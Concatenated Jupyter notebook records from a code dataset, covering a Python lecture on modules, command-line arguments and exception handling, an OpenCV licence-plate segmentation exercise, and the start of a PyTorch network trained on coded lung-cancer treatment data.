"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
]
] |
cb2b83c66c4a5bf6075d4d94e36a5b4cce7b1ead | 18,093 | ipynb | Jupyter Notebook | lecture_08_modules_input_errors.ipynb | CUBoulder-ASTR2600/lectures | 41740e09d4388b94dadc1ce2b017f5dac538ee30 | [
"0BSD"
] | null | null | null | lecture_08_modules_input_errors.ipynb | CUBoulder-ASTR2600/lectures | 41740e09d4388b94dadc1ce2b017f5dac538ee30 | [
"0BSD"
] | null | null | null | lecture_08_modules_input_errors.ipynb | CUBoulder-ASTR2600/lectures | 41740e09d4388b94dadc1ce2b017f5dac538ee30 | [
"0BSD"
] | null | null | null | 19.926211 | 130 | 0.508152 | [
[
[
"# Making your own modules",
"_____no_output_____"
],
[
"If a function will be used in multiple programs, it should be written \nas a module instead. \n\nAll one has to do is put the functions in a program_name.py\nfile and import it (the whole thing) or the functions, then \nuse them in the main program.\n\nExactly the same way how you import and use other libraries.\n\n## Example\nGiven mass and velocity, this function calculates the kinetic energy of a particle\nin meters/kilograms/seconds (mks) units.",
"_____no_output_____"
],
[
"$$E_k = \\frac{1}{2} \\cdot mv^2$$",
"_____no_output_____"
]
],
[
[
"def eKinetic(mass, velocity):\n return 0.5 * mass * velocity**2",
"_____no_output_____"
],
[
"eKinetic(1, 10)",
"_____no_output_____"
]
],
[
[
"#### Q. What will the output be?",
"_____no_output_____"
],
[
"The following function calculates the x, y, and z accelerations \nof a particle resulting from forces acting upon it given its mass.\n\nAll units are SI.",
"_____no_output_____"
],
[
"$a=\\frac{F}{m}$ rearranged from $F=ma$\n\n> Note: These techniques are also related to some of the tasks in the homework and the final project.",
"_____no_output_____"
]
],
[
[
"def acceleration(xForce, yForce, zForce, mass):\n xAccel = float(xForce) / float(mass)\n yAccel = float(yForce) / float(mass)\n zAccel = float(zForce) / float(mass)\n \n return (xAccel, yAccel, zAccel)",
"_____no_output_____"
]
],
[
[
"#### Q. What will this do?",
"_____no_output_____"
]
],
[
[
"acceleration(10, 20, 30, 5)",
"_____no_output_____"
]
],
[
[
"I put eKinetic and acceleration in a module called kinematics.py using a text editor.\n\nNow, try the module in an IPython session:",
"_____no_output_____"
]
],
[
[
"# remember that this line overwrites the local definition\n# because it has the same name as above!\n\nfrom kinematics import eKinetic, acceleration\n\nmass = 100\nvelocity = 10\nxForce = 10\nyForce = 20\nzForce = 30\n\nkEnergy = eKinetic(mass, velocity)\nmAccel = acceleration(xForce, yForce, zForce, mass)\n\nkEnergy, mAccel",
"_____no_output_____"
]
],
[
[
"### Providing program arguments on the command-line",
"_____no_output_____"
],
[
"Input is often supplied to Python scripts via the command line.\n\nPut another way, \"arguments\" are provided to scripts.\n\nHere are some Linux examples:\n\n```bash\necho $PATH\n``` \n\necho is the command, `$PATH` is an argument. Or, \n\n```bash\ncd some_directory\n```\n\ncd is the commmand, `some_directory` is an argument.\n\n```bash\n cd\n```\n\nNo arguments here -- default behavior: cd $HOME",
"_____no_output_____"
],
[
"We can do the same sort of thing in Python using the sys module. \nThe following script (lecture_08_wavetofreq.py) converts a \nuser-supplied wavelength (in Angstroms) to frequency (in Hz).\n\nI show you here how to quickly load an existing script into the notebook, using %load:",
"_____no_output_____"
]
],
[
[
"# %load lecture_08_wavetofreq.py\n#!/usr/bin/env python\n\nimport sys\nwave = float(sys.argv[1])\nfreq = 3.0e8 / (wave / 1e10)\nprint('frequency (Hz) = %e' % freq)\n",
"_____no_output_____"
],
[
"import sys # \"sys\" is short for \"system\"\nwave = float(sys.argv[1])\nfreq = 3.0e8 / (wave / 1e10) # pass wavelength in Angstroms\nprint('frequency (Hz) = %e' % freq)\n",
"_____no_output_____"
],
[
"sys.argv",
"_____no_output_____"
]
],
[
[
"sys.argv contains a list of the command line arguments to the program. \n\nsys.argv[0] is always the name of the program.",
"_____no_output_____"
],
[
"To run it in a Linux terminal (must be in same directory as file):\n\n```bash\npython lecture_08_wavetofreq.py 5000\n```\n\nTo run it within here or a simple ipython terminal (file must be in same directory that you \nlaunched the notebook from):",
"_____no_output_____"
]
],
[
[
"%run lecture_08_wavetofreq.py 5000",
"_____no_output_____"
]
],
[
[
"#### Q. What if there is more than one command-line input required?",
"_____no_output_____"
]
],
[
[
"\n\n\n\n\n\n\n\n\n\n\n\n\n",
"_____no_output_____"
],
[
"Consider the following script:",
"_____no_output_____"
]
],
[
[
"import sys\n\nfor i, element in enumerate(sys.argv):\n print(\"Argument #{} = {}\".format(i, element))",
"_____no_output_____"
]
],
[
[
"I have it saved in a file called lecture_08_systest.py",
"_____no_output_____"
]
],
[
[
"#### Q. What will the following command do in a Linux session?",
"_____no_output_____"
]
],
[
[
"python lecture_08_systest.py 'hello' 2 4 6",
"_____no_output_____"
]
],
[
[
"You will practice with sys in the tutorial!",
"_____no_output_____"
]
],
[
[
"%run lecture_08_systest.py 'hello' 2 4 6",
"_____no_output_____"
]
],
[
[
"### Error Handling",
"_____no_output_____"
],
[
"The script lecture_08_wavetofreq.py expects an argument, the \nwavelength in Angstroms:\n",
"_____no_output_____"
]
],
[
[
"# lecture_08_wavetofreq.py\n\nimport sys\nwave = float(sys.argv[1]) # Attempting to use the argument here.\nfreq = 3.0e8 / (wave / 1e10) # Convert wavelength in Angstroms to frequency in Hz\nprint('frequency (Hz) = %e' % freq)",
"_____no_output_____"
]
],
[
[
"If we forget to supply that argument, we get an error message:",
"_____no_output_____"
]
],
[
[
"%run lecture_08_wavetofreq.py",
"_____no_output_____"
]
],
[
[
"It tells us what file and what line where the error occured and \nthe type of error (IndexError)",
"_____no_output_____"
],
[
"#### Q. What is a simple way we could tell if the user forgot the argument and exit the program gracefully without a crash?",
"_____no_output_____"
]
],
[
[
"Hint: Where are the arguments held again?",
"_____no_output_____"
],
[
"\n\n\n\n\n\n\n\n\n\n\n\n\n\n",
"_____no_output_____"
],
[
"We could test the length of sys.argv and if it is < 2; if so, we could \nabort with an error message (this script is saved in \nlecture_08_wavetofreq2.py):",
"_____no_output_____"
]
],
[
[
"# lecture_08_wavetofreq2.py\n\nimport sys\n\nif len(sys.argv) < 2:\n print('Enter the wavelength in Angstroms on the command line.')\n sys.exit(1) # Exits and 1 indicates failure\n # sys.exit() or sys.exit(0) is used to indicate success\n\nwave = float(sys.argv[1])\nfreq = 3.0e8 / (wave / 1e10)\nprint('frequency (Hz) = %e' % freq )",
"_____no_output_____"
]
],
[
[
"#### Q. What will the following yield?",
"_____no_output_____"
]
],
[
[
"%run lecture_08_wavetofreq2.py 5000",
"_____no_output_____"
]
],
[
[
"#### Q. And this?",
"_____no_output_____"
]
],
[
[
"%run lecture_08_wavetofreq2.py",
"_____no_output_____"
],
[
"%tb",
"_____no_output_____"
]
],
[
[
"### Exception Handling",
"_____no_output_____"
],
[
"Alternatively, the program can try to run the code and \nif errors are found, jump to statements that handle \nthe error as desired.\n\nThis is done with two new reserved words, \"try\" and \"except\", \nwhich are used in a similar way as \"if\" and \"elif\". ",
"_____no_output_____"
],
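[
"# The try/except pattern in miniature, before applying it to the wavelength script\n# below (a generic illustration, not one of the lecture_08 files):\nitems = [10, 20, 30]\n\ntry:\n    value = items[5]      # raises an IndexError\nexcept IndexError:\n    value = None          # handled instead of crashing\n\nprint(value)",
"_____no_output_____"
],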
[
"This is the script lecture_08_wavetofreq3.py:",
"_____no_output_____"
]
],
[
[
"# lecture_08_wavetofreq3.py\n\nimport sys\n\ntry:\n wave = float(sys.argv[1])\nexcept:\n print('Enter the wavelength in Angstroms on the command line.')\n sys.exit(1)\n\nfreq = 3.0e8 / (wave / 1e10)\nprint('frequency (Hz) = %e' % freq)",
"_____no_output_____"
]
],
[
[
"If the command in the try block produces an error, the except block \nis executed.",
"_____no_output_____"
],
[
"#### Q. What does \"wave = float(sys.argv[1])\" attempt to do?",
"_____no_output_____"
],
[
"#### Q. What if we try to do the following:",
"_____no_output_____"
]
],
[
[
"%run lecture_08_wavetofreq3.py x",
"_____no_output_____"
],
[
"%tb",
"_____no_output_____"
]
],
[
[
"> The program could also fail if something other than a number is given \non the command line!",
"_____no_output_____"
],
[
"That produces a ValueError, not an IndexError.\n\nWe can fix this with two separate exceptions appropriate for the two \npossible errors (this is similar to if/elif/elif):",
"_____no_output_____"
]
],
[
[
"# lecture_08_wavetofreq4.py\n\nimport sys\n\ntry:\n wave = float(sys.argv[1])\n \nexcept IndexError:\n print('Enter the wavelength in Angstroms on the command line.')\n sys.exit(1)\n\nexcept ValueError as error:\n #print 'The wavelength must be a number'\\\n #' not %s.' % type(sys.argv[1])\n print(\"The error is:\", error)\n sys.exit(2)\n\nfreq = 3.0e8 / (wave / 1e10)\nprint('frequency (Hz) = %e' % freq)",
"_____no_output_____"
]
],
[
[
"This script is saved in the file lecture_08_wavetofreq4.py",
"_____no_output_____"
]
],
[
[
"#### Q. What do these yield?",
"_____no_output_____"
]
],
[
[
"%run lecture_08_wavetofreq4.py 5000",
"_____no_output_____"
],
[
"%run lecture_08_wavetofreq4.py",
"_____no_output_____"
],
[
"%run lecture_08_wavetofreq4.py x",
"_____no_output_____"
]
],
[
[
"### Common error types",
"_____no_output_____"
]
],
[
[
"IndexError for indices out of range:",
"_____no_output_____"
]
],
[
[
"data = range(9)\ndata[9]",
"_____no_output_____"
]
],
[
[
"Q. Why does it fail?\n\n\n",
"_____no_output_____"
],
[
"Converting a str to a float gives a ValueError:",
"_____no_output_____"
]
],
[
[
"y = float('x')",
"_____no_output_____"
],
[
"y = float('3')\ny",
"_____no_output_____"
]
],
[
[
"Using an uninitialized variable gives a NameError:",
"_____no_output_____"
]
],
[
[
"x",
"_____no_output_____"
]
],
[
[
"Division by zero raises a ZeroDivisionError exception:",
"_____no_output_____"
]
],
[
[
"4.0/0",
"_____no_output_____"
]
],
[
[
"Syntax errors lead to SyntaxErrors!",
"_____no_output_____"
]
],
[
[
"iff 2 > 1:\n print('it is.')",
"_____no_output_____"
]
],
[
[
"Multiplying a string by a float yields a TypeError:",
"_____no_output_____"
]
],
[
[
"10.0 * 'blah'",
"_____no_output_____"
]
],
[
[
"#### Q. But what will this do?",
"_____no_output_____"
]
],
[
[
"5 * 'blah '",
"_____no_output_____"
]
],
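[
[
"# Several of the error types above can be caught with a single except clause by listing\n# them in a tuple (a generic illustration, not part of the lecture files):\nfor bad in ['x', None]:\n    try:\n        print(float(bad))\n    except (ValueError, TypeError) as error:\n        print('could not convert', repr(bad), '->', error)",
"_____no_output_____"
]
],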
[
[
"Nice flowchart on error handling (http://i.imgur.com/WRuJV6r.png):\n\n",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"raw",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"raw",
"code",
"raw",
"markdown",
"raw",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"raw",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"raw",
"markdown",
"code",
"markdown",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"raw",
"raw"
],
[
"code"
],
[
"raw"
],
[
"markdown"
],
[
"raw"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"raw",
"raw",
"raw"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"raw"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"raw"
],
[
"code"
],
[
"raw",
"raw"
],
[
"code",
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb2b8aa4d583fb1ecb384bc88294d9cc191f065b | 92,159 | ipynb | Jupyter Notebook | research/code/pytorch_lstm_neuralnetwork.ipynb | fuzzzyy17/continuous-visual-perception | 91b125be1d4800c7f8167724806ba246a58f4895 | [
"MIT"
] | null | null | null | research/code/pytorch_lstm_neuralnetwork.ipynb | fuzzzyy17/continuous-visual-perception | 91b125be1d4800c7f8167724806ba246a58f4895 | [
"MIT"
] | null | null | null | research/code/pytorch_lstm_neuralnetwork.ipynb | fuzzzyy17/continuous-visual-perception | 91b125be1d4800c7f8167724806ba246a58f4895 | [
"MIT"
] | null | null | null | 74.142397 | 1,310 | 0.680921 | [
[
[
"empty"
]
]
] | [
"empty"
] | [
[
"empty"
]
] |
cb2b8fabe4ef5b07dc632a712ff5975161b3c865 | 67,378 | ipynb | Jupyter Notebook | Colab_Class/binarySegmentation.ipynb | josearangos/PDI | 0339aa4dbfce83d91138ea1ffaf6770f0392c2fb | [
"ADSL"
] | 1 | 2020-02-22T00:45:07.000Z | 2020-02-22T00:45:07.000Z | Colab_Class/binarySegmentation.ipynb | josearangos/PDI | 0339aa4dbfce83d91138ea1ffaf6770f0392c2fb | [
"ADSL"
] | null | null | null | Colab_Class/binarySegmentation.ipynb | josearangos/PDI | 0339aa4dbfce83d91138ea1ffaf6770f0392c2fb | [
"ADSL"
] | null | null | null | 193.614943 | 19,082 | 0.869379 | [
[
[
"<a href=\"https://colab.research.google.com/github/josearangos/PDI/blob/Colab/Colab_Class/binarySegmentation.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
]
],
[
[
"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom google.colab.patches import cv2_imshow",
"_____no_output_____"
]
],
[
[
"## Segmentación binaria\n\n\n### Actividad\n\nEn esta clase se analiza una imagen binarizada de un carro(entrada) en donde se resalta la placa y se busca sacar solo la placa\n\n",
"_____no_output_____"
]
],
[
[
"! wget https://github.com/josearangos/PDI/raw/Colab/Resources/Image/placa_bina.png\n! wget https://github.com/josearangos/PDI/raw/Colab/Resources/Image/carro_shape.jpg",
"--2020-04-02 23:57:55-- https://github.com/josearangos/PDI/raw/Colab/Resources/Image/placa_bina.png\nResolving github.com (github.com)... 140.82.113.4\nConnecting to github.com (github.com)|140.82.113.4|:443... connected.\nHTTP request sent, awaiting response... 302 Found\nLocation: https://raw.githubusercontent.com/josearangos/PDI/Colab/Resources/Image/placa_bina.png [following]\n--2020-04-02 23:57:55-- https://raw.githubusercontent.com/josearangos/PDI/Colab/Resources/Image/placa_bina.png\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...\nConnecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 6484 (6.3K) [image/png]\nSaving to: ‘placa_bina.png’\n\n\rplaca_bina.png 0%[ ] 0 --.-KB/s \rplaca_bina.png 100%[===================>] 6.33K --.-KB/s in 0s \n\n2020-04-02 23:57:55 (103 MB/s) - ‘placa_bina.png’ saved [6484/6484]\n\n--2020-04-02 23:57:56-- https://github.com/josearangos/PDI/raw/Colab/Resources/Image/carro_shape.jpg\nResolving github.com (github.com)... 140.82.113.4\nConnecting to github.com (github.com)|140.82.113.4|:443... connected.\nHTTP request sent, awaiting response... 302 Found\nLocation: https://raw.githubusercontent.com/josearangos/PDI/Colab/Resources/Image/carro_shape.jpg [following]\n--2020-04-02 23:57:56-- https://raw.githubusercontent.com/josearangos/PDI/Colab/Resources/Image/carro_shape.jpg\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...\nConnecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 142567 (139K) [image/jpeg]\nSaving to: ‘carro_shape.jpg’\n\ncarro_shape.jpg 100%[===================>] 139.23K --.-KB/s in 0.04s \n\n2020-04-02 23:57:56 (3.64 MB/s) - ‘carro_shape.jpg’ saved [142567/142567]\n\n"
]
],
[
[
"## Leemos la imagen",
"_____no_output_____"
]
],
[
[
"a = cv2.imread('placa_bina.png',0) #Leemos nuestra imagen de dos dimensiones\nb = a.copy() #Creamos una copia\nfil,col = b.shape #Guardamos sus dimensiones en variables separadas\ncv2_imshow(b)",
"_____no_output_____"
]
],
[
[
"## Aplicamos la mascara",
"_____no_output_____"
]
],
[
[
"a = cv2.threshold(a,127,255,cv2.THRESH_BINARY)[1] #Convertimos nuestra imagen para hacerla de una sola dimensión para poder aplicar la función de conectividad con la cual etiquetaremos las secciones que están interconectadas\nret, labels = cv2.connectedComponents(a,4) #Guardamos el número de etiquetas y una matriz que contiene el valor de cada pixel (La etiqueta que le corresponde)\n#MAP COMPONENTS TO HUE VAL (formula to hsv) Con esta formula tomamos la matriz de etiquetas resultantes y creamos una imagen con pseudo colores de nuestra imagen original pero con los pixeles que comparten etiqueta del mismo color\nlabel_hue = np.uint8(179*labels/np.max(labels))\nblank_ch = 255*np.ones_like(label_hue)\nlabeled_a = cv2.merge([label_hue, blank_ch, blank_ch])\n#cvt to bgr for display\nlabeled_a = cv2.cvtColor(labeled_a, cv2.COLOR_HSV2BGR)\n#Convert background to black\nlabeled_a[label_hue==0] = 255 #Convertimos en cero los pixeles que en la matriz de etiquetas son cero\ncv2_imshow(labeled_a)\n",
"_____no_output_____"
]
],
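[
[
"# An optional shortcut (not used in the rest of this notebook):\n# cv2.connectedComponentsWithStats returns the pixel count of every component directly,\n# which avoids the manual counting loop in the next cell.\nnum, lab, stats, centroids = cv2.connectedComponentsWithStats(a, 4)\nsizes = stats[1:, cv2.CC_STAT_AREA]    # pixel count per label (label 0 is the background)\nbiggest = 1 + int(np.argmax(sizes))    # label of the largest connected component\nprint('largest component:', biggest, 'with', int(sizes.max()), 'pixels')",
"_____no_output_____"
]
],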
[
[
"## Graficamos la distribución de pixeles",
"_____no_output_____"
]
],
[
[
"#Con las dos líneas de código anteriores hacemos cero los valores no etiquetados para mostrarlos en negro\ntotal = [] #Creamos un arreglo para guardar el numero de pixeles que comparten cada etiqueta por etiqueta\nvalor = 0 #Variable que almacenará el número de pixeles que comparten una etiqueta\n#Con las dos líneas de código anteriores hacemos cero los valores no etiquetados para mostrarlos en negro\nfor i in range (1,ret): #Con este ciclo for guardamos el número de pixeles que tiene cada etiqueta y lo guardamos en una lista\n valor = i\n c = b*0\n c[labels == i] = 1\n suma = np.sum(c)\n total = [(valor,suma)] + total\nx_list = [l[0] for l in total] #Extraemos de la lista el valor de cada etiqueta\ny_list = [l[1] for l in total] #Extraemos el valor de la suma de cada etiqueta\n\ny_list = np.uint32(y_list) #Convertimos los valores obtenidos en la suma de pixeles de la etiqueta a 32 bits\nplt.scatter(x_list,y_list) # Graficamos los calor x = etiquetas y = valor suma pixeles etiquera\nplt.show() #Mostramos la gráfica",
"_____no_output_____"
],
[
"\nd = cv2.imread('carro_shape.jpg',1) #Leemos la imagen que extraímos en formato s de hsv\nmx = np.max(total) #Buscamos la etiqueta que tienen el mayor número de pixeles interconectados\nind = []\nind = np.where(mx==total) # Guardamos en un arreglo cada pixel que tenga el valor de mx\nc = b*0 # Creamos una matriz vacia del tamaño de b (La imagen que tenemos de carro en 3 capas)\nc[labels == 262] = 255 #Cada pixel que tenga el valor de la etiqueta con más pixeles que la conforman lo hacemos 255 (negro)\ncv2_imshow(c) #Mostramos la imagen obtenida en la linea de código anterior\nx,y = np.where(c>0) #Guardamos las coordenadas de cada pixel en negro (255) de C\nfm = np.min(x) #Guardamos su valor mínimo en x\nfx = np.max(x) #Guardamos su valor máximo en x\ncm = np.min(y) #Guardamos su valor mínimo en y\ncx = np.max(y) #Guardamos su valor máximo en y\nd = d[fm:fx,cm:cx,:] #Tomamos de la imagen origianl el area encerrada por los valores obtenido en las cuatro líneas de código anterior\n",
"_____no_output_____"
]
],
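[
[
"# An equivalent crop using cv2.boundingRect on the largest-component mask c built above\n# (shown only as an alternative to the np.where / min / max approach; the original crop kept in d is unchanged):\nd0 = cv2.imread('carro_shape.jpg', 1)      # reload the untouched colour image\npts = cv2.findNonZero(np.uint8(c))         # coordinates of the mask pixels\nxb, yb, wb, hb = cv2.boundingRect(pts)     # x, y, width, height of the plate region\nplate = d0[yb:yb+hb, xb:xb+wb, :]\ncv2_imshow(plate)",
"_____no_output_____"
]
],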
[
[
"## Resultado placa",
"_____no_output_____"
]
],
[
[
"cv2_imshow(d) #Mostramos la imagen obtenida",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2bae0f9c97f0ad072ed313ddf6d45741f3e625 | 152,826 | ipynb | Jupyter Notebook | code/ANN_analysis-release.ipynb | GuanRunwei/A-Clinical-Decision-Support-System-of-EGFR-TKIs | 9faa317674e6ab181d7132003d9f5548471a1003 | [
"Apache-2.0"
] | null | null | null | code/ANN_analysis-release.ipynb | GuanRunwei/A-Clinical-Decision-Support-System-of-EGFR-TKIs | 9faa317674e6ab181d7132003d9f5548471a1003 | [
"Apache-2.0"
] | null | null | null | code/ANN_analysis-release.ipynb | GuanRunwei/A-Clinical-Decision-Support-System-of-EGFR-TKIs | 9faa317674e6ab181d7132003d9f5548471a1003 | [
"Apache-2.0"
] | null | null | null | 101.884 | 34,368 | 0.817616 | [
[
[
"import torch\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import svm\nfrom xgboost import XGBClassifier\nfrom sklearn.metrics import recall_score\nfrom joblib import dump, load\nfrom sklearn.metrics import roc_curve, auc\nimport matplotlib.pyplot as plt\n\nfrom sklearn.externals import joblib",
"E:\\Anaconda\\Software\\lib\\site-packages\\sklearn\\externals\\joblib\\__init__.py:15: DeprecationWarning: sklearn.externals.joblib is deprecated in 0.21 and will be removed in 0.23. Please import this functionality directly from joblib, which can be installed with: pip install joblib. If this warning is raised when loading pickled models, you may need to re-serialize those models with scikit-learn 0.21+.\n warnings.warn(msg, category=DeprecationWarning)\n"
],
[
"device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nprint(torch.cuda.is_available())",
"True\n"
],
[
"new_file = 'newnew.xlsx'",
"_____no_output_____"
],
[
"new_dataframe = pd.read_excel(new_file, sheet_name=0)\nnew_dataframe1 = pd.read_excel(new_file, sheet_name=2).iloc[:, range(16)]\nnew_dataframe2 = pd.read_excel(new_file, sheet_name=2).iloc[:, range(17,31)]",
"_____no_output_____"
],
[
"# Dataset1\nnew_dataframe.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 158 entries, 0 to 157\nData columns (total 12 columns):\n性别 158 non-null int64\n年龄 158 non-null int64\n吸烟 158 non-null int64\n部位 158 non-null int64\n原发灶大小 158 non-null int64\n骨转移 158 non-null int64\n脑转移 158 non-null int64\n肝转 158 non-null int64\n肺内转移 158 non-null int64\n胸膜转移 158 non-null int64\n治疗方案 158 non-null int64\n疗效差0差1好/9个月 158 non-null int64\ndtypes: int64(12)\nmemory usage: 14.9 KB\n"
],
[
"# Dataset2\nnew_dataframe1.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 158 entries, 0 to 157\nData columns (total 16 columns):\n性别 158 non-null int64\n年龄 158 non-null int64\n吸烟 158 non-null int64\n部位 158 non-null int64\n原发灶大小 158 non-null int64\n骨转移 158 non-null int64\n脑转移 158 non-null int64\n肝转 158 non-null int64\n肺内转移 158 non-null int64\n胸膜转移 158 non-null int64\n治疗方案 158 non-null int64\n突变情况123 158 non-null int64\nTP53 158 non-null int64\nrb1 158 non-null int64\npik3ca 158 non-null int64\n疗效差1差2好/9个月 158 non-null int64\ndtypes: int64(16)\nmemory usage: 19.9 KB\n"
],
[
"# Dataset3\nnew_dataframe2.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 158 entries, 0 to 157\nData columns (total 14 columns):\n性别.1 158 non-null int64\n年龄.1 158 non-null int64\n吸烟.1 158 non-null int64\n部位.1 158 non-null int64\n原发灶大小.1 158 non-null int64\n骨转移.1 158 non-null int64\n脑转移.1 158 non-null int64\n肝转.1 158 non-null int64\n肺内转移.1 158 non-null int64\n胸膜转移.1 158 non-null int64\n治疗方案.1 158 non-null int64\n突变情况123.1 158 non-null int64\nN 158 non-null int64\n疗效差1差2好/9个月.1 158 non-null int64\ndtypes: int64(14)\nmemory usage: 17.4 KB\n"
]
],
[
[
"## Dataset for outside validation",
"_____no_output_____"
]
],
[
[
"## outside validation\ntest_frame1 = pd.read_excel(new_file, sheet_name=1)\ntest_frame2 = pd.read_excel(new_file, sheet_name=3).iloc[:, range(16)]\ntest_frame3 = pd.read_excel(new_file, sheet_name=3).iloc[:, range(17,31)]",
"_____no_output_____"
],
[
"# Dataset1\nX_first = new_dataframe.iloc[:,range(0,11)]\ny_first = new_dataframe.iloc[:, -1] # 第二个指标\nX_first = np.asarray(X_first)\n\n# Dataset2\nX_second = new_dataframe1.iloc[:,range(0,15)]\ny_second = new_dataframe1.iloc[:, -1] # 第二个指标\nX_second = np.asarray(X_second)\n\n# Dataset3\nX_third = new_dataframe2.iloc[:,range(0,13)]\ny_third = new_dataframe2.iloc[:, -1] # 第二个指标\nX_third = np.asarray(X_third)",
"_____no_output_____"
],
[
"y_first = np.array(y_first)\ny_second = np.array(y_second)\ny_third = np.array(y_third)",
"_____no_output_____"
],
[
"X_train_first, X_test_first, y_train_first, y_test_first= train_test_split(X_first, y_first, test_size=0.2, random_state=100)\nX_test_first = torch.Tensor(X_test_first)\nX_train_first = torch.Tensor(X_train_first)\ny_train_first = torch.Tensor(y_train_first)\ny_test_first = torch.Tensor(y_test_first)",
"_____no_output_____"
],
[
"X_train_second, X_test_second, y_train_second, y_test_second = train_test_split(X_second, y_second, test_size=0.2, random_state=100)\nX_train_second = torch.Tensor(X_train_second)\nX_test_second = torch.Tensor(X_test_second)\ny_train_second = torch.Tensor(y_train_second)\ny_test_second = torch.Tensor(y_test_second)",
"_____no_output_____"
],
[
"X_train_third, X_test_third, y_train_third, y_test_third = train_test_split(X_third, y_third, test_size=0.2, random_state=100)\nX_train_third, X_test_third, y_train_third, y_test_third = torch.Tensor(X_train_third), torch.Tensor(X_test_third),torch.Tensor(y_train_third),torch.Tensor(y_test_third)",
"_____no_output_____"
]
],
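[
[
"# The outcome labels are imbalanced (mostly 1s), so a stratified split -- an optional\n# alternative to the plain splits above -- keeps the class ratio similar in train and test:\nXs_tr, Xs_te, ys_tr, ys_te = train_test_split(\n    X_first, y_first, test_size=0.2, random_state=100, stratify=y_first)\nprint('positive rate in the test split:', ys_te.mean())",
"_____no_output_____"
]
],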
[
[
"## ANN Training",
"_____no_output_____"
],
[
"### Model for Dataset1",
"_____no_output_____"
]
],
[
[
"class Feedforward_first(torch.nn.Module):\n def __init__(self, input_size, hidden_size):\n super(Feedforward_first, self).__init__()\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.batchnorm = torch.nn.BatchNorm1d(self.hidden_size)\n self.laynorm = torch.nn.LayerNorm(self.input_size)\n self.fc1 = torch.nn.Linear(self.input_size, self.hidden_size, bias=True)\n self.relu = torch.nn.ReLU()\n self.fc2 = torch.nn.Linear(self.hidden_size, 5, bias=True)\n self.relu2 = torch.nn.ReLU()\n self.fc3 = torch.nn.Linear(5, 1, bias=True)\n self.sigmoid = torch.nn.Sigmoid()\n def forward(self, x):\n hidden = self.fc1(x)\n batchnorm = self.batchnorm(hidden)\n layborm = self.batchnorm(batchnorm)\n relu = self.relu(batchnorm)\n output = self.fc2(relu)\n output = self.relu2(output)\n output = self.fc3(output)\n output = self.sigmoid(output)\n return output",
"_____no_output_____"
],
[
"X_train_first.shape[1]",
"_____no_output_____"
],
[
"model1 = Feedforward_first(X_train_first.shape[1],10)\ncriterion1 = torch.nn.BCELoss()\noptimizer1 = torch.optim.SGD(model1.parameters(), lr = 0.01, momentum=0.9, weight_decay= 0.001)",
"_____no_output_____"
],
[
"model1.train()\nepoch = 200\nloss_array = []\nfor epoch in range(epoch):\n optimizer1.zero_grad()\n # Forward pass\n y_pred = model1(X_train_first)\n # Compute Loss\n loss = criterion1(y_pred.squeeze(), y_train_first)\n loss_array.append(float(loss.item()))\n print('Epoch {}: train loss: {}'.format(epoch, loss.item()))\n # Backward pass\n loss.backward()\n optimizer1.step()",
